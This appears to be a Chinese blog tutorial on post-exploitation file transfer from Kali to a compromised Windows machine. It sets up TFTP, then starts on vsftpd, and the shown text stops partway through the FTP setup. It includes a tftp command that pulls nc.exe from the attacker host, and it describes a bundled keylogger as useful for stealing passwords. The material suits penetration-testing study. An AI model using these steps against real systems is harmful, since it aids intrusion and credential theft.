先要在作为服务器的机器上创建一个根目录 , 这个目录用于存放各种远程控制软件:
文章插图
mkdir /tftp
【关于后漏洞利用阶段的介绍】修改tftp文件夹的拥有者 , 让谁都可以访问:
文章插图
chown -R nobody /tftp/
找一些kali里默认存放着的一些控制工具到tftp文件夹:
文章插图
cp /usr/share/windows-binaries/nc.exe /tftp
在
/usr/share/windows-binaries/目录下 , 存放了一些为windows机器准备的一些安装程序 。
启动tftp的服务:
文章插图
atftpd --daemon --port 69 /tftp
参数--daemon表示在后台运行 , 后面的--port就是指定端口 。
可以通过检查端口来判断tftp的服务是否启动:
文章插图
netstat -pantu | grep 69
需要注意的一点是 , 如果你的检查结果显示(最右边那项)进程不是atftpd , 可能是你的权限还有问题 , 没有将tftp文件夹和里面的所有文件的拥有者改成nobody 。
当然就算检查结果显示进程是atftpd , 如果tftp文件夹里的文件不是nobody , 后面其他机器想要下载也会有问题 。所以只要有文件放入tftp文件夹 , 就执行一下上面修改文件拥有者的命令:
文章插图
修改文件的权限
然后就可以在Windows机器去下载kali里的文件了:
文章插图
tftp -i 192.168.0.102 get nc.exe
这里介绍两个kali里为Windows机器准备的三个程序 。第一个是nc.exe , 它的功能和netcat类似;第二个是whoami.exe , 可以检查当前使用账户的权限;第三个是klogger.exe , 一旦运行 , 就会记录所有键盘的敲击 , 对于盗取账户密码应该是很挺有用的 。
往Windows传文件:FTPkali默认是没有预装ftp工具的 , 所以需要自己选择一个ftp工具进行安装 。ftp的工具有很多 , 比如vsftpd、pure-ftpd等等 , 这里使用的是vsftpd 。
安装比较简单 , 直接一个命令就可以:
文章插图
apt-get install vsftpd
如果下载不成功的话 , 可以到/etc/apt/sources.list文件里修改一下源地址 。
vsftpd常用的命令如下:
# 启动服务service vsftpd start# 查看服务service vsftpd status# 停止服务service vsftpd stop# 重新启动服务service vsftpd restart可以先启动一下 , 看看能不能顺利启动:
文章插图
检查vsftpd安装是否正确
接下来先要创建一个用于上传下载的目录 , 要给创建的这个目录修改一下权限 , 因为实际使用中会创建、修改文件 , 我这边图简便就直接777了:
文章插图
创建上传/下载的目录
然后需要新建用户并设置密码:
文章插图
新建用户
如果不明白useradd各个参数的使用 , 可以通过-h看一下使用说明 。这里-d表示设置新用户的home目录 , -s表示新用户的登录方式 。
修改配置文件vsftpd.conf:
文章插图
控制用户登录
还有将vsftpd.conf文件里的这个注释取消:
文章插图
取消注释
取消这个注释是为了能够写入文件 。
前面配置的时候是用/root/allowed_users文件来控制登录 , 那就要到对应位置创建文件:
文章插图
设置登录用户
在配置了登录用户后 , 你可能会发现这些用户还是无法登录 , 那你就可以到黑名单文件看一下 , 你的用户是否在黑名单上面:
推荐阅读
![[咖门红]新湖期货郑州:“妖糖”的走势与操作分析](https://imgcdn.toutiaoyule.com/20200428/20200428084015539633a_t.jpeg)
- 关于垃圾收集器Parallel Scavenge的GCTimeRatio参数的理解
- 肺癌患者术后有哪些需要注意的
- 肺癌手术后需要注意什么
- 养老保险交15年和25年,退休后的退休金差距大吗?
- 公务员死亡后有哪些待遇?主要有四笔
- 四十岁后,具备这三种力,才能过好后半生
- 后驱更好开,为什么大部分家用车都被设计成前驱?
- 求职|九零,零零后的各位,你们工作能实现双休吗?
- 大雪节气过后御寒的三款食谱推荐
- 阑尾炎不能吃什么 阑尾炎手术后饮食的注意事项